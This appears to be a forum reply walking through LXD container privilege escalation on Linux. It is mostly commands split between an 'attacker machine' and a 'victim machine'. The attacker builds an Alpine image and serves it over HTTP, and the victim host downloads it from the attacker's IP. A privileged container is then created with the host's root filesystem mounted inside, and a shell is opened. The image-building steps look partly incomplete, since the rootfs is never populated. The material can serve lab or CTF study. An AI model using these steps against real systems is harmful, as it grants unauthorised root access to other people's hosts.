try building the img without distrobuilder, the steps would like smth like this.
on attacker machine:
sudo apt update
sudo apt install -y rsync tar squashfs-tools
mkdir -p ~/ContainerImages/alpine/rootfs
cd ~/ContainerImages/alpine
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
mksquashfs rootfs rootfs.squashfs -comp xz -noappend
mkdir -p metadata
nano metadata/metadata.yaml # (add yaml snippet here, from the bottom of this reply)
tar -cJf lxd.tar.xz -C metadata metadata.yaml
python3 -m http.server 8000
on victim machine:
wget http://yourIP:8000/lxd.tar.xz
wget http://yourIP:8000/rootfs.squashfs
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list
lxc init alpine privesc -c security.privileged=true
lxc list
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
metadata.yaml (put the following in the yaml file)
architecture: x86_64
creation_date: 1704245556
properties:
description: “Alpine Linux 3.18”
os: alpine
release: 3.18
variant: default